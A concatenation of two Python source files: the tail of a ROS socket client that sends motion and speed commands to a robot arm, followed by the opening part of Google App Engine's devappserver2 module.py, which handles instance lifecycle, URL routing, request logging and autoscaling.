data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", s)
#Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
s.send(data)
##-----------socket client--------
def socket_client():
#global Socket
try:
Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.get_recieve())
Socket_feedback(Socket)
# while 1:
# feedback_str = Socket.recv(1024)
# #手臂端傳送手臂狀態
# if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6 策略完成
# state_feedback.ArmState = 6
# print("shutdown")
# #確認傳送旗標
# if str(feedback_str[4]) == '48':#回傳0 false
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':#回傳1 true
# state_feedback.SentFlag = 1
# ##---------------socket 傳輸手臂命令 end-----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
if arm_mode_flag == True:
arm_mode_flag = False
Socket_command(Socket)
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import gcs_application
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
try:
from google.appengine.tools.devappserver2 import java_runtime
except ImportError:
java_runtime = None
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
}
if java_runtime:
_RUNTIME_INSTANCE_FACTORIES.update({
'java': java_runtime.JavaRuntimeInstanceFactory,
'java7': java_runtime.JavaRuntimeInstanceFactory,
})
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
A instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
A list of url_handler.URLHandlers corresponding that can react as
described in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % gcs_application.GCS_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(gcs_application.Application(), url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._module_configuration.module_name:
runtime_config.version_id = '%s:%s' % (
self._module_configuration.module_name, runtime_config.version_id)
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_host = self._api_host
runtime_config.api_port = self._api_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
if self._max_instances is not None:
runtime_config.max_instances = self._max_instances
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._php_config and self._module_configuration.runtime == 'php':
runtime_config.php_config.CopyFrom(self._php_config)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=has_file_changes)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIModule listens for RPC requests on.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._host = host
self._api_host = api_host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_config = php_config
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
@property
def name(self):
"""The name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._name
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status):
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
def _handle_request(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst:
try:
environ['SERVER_PORT'] = str(self.get_instance_port(inst.instance_id))
except request_info.NotSupportedWithAutoScalingError:
environ['SERVER_PORT'] = str(self.balanced_port)
else:
environ['SERVER_PORT'] = str(self.balanced_port)
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], self._default_version_port)
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.version_id,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version,
module=self._module_configuration.module_name)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
int(environ.get('CONTENT_LENGTH') or '0') != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
with self._handler_lock:
handlers = self._handlers
try:
request_url = environ['PATH_INFO']
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(request_url)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', request_url)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
_THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_host,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_config,
self._python_config,
self._cloud_sql_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
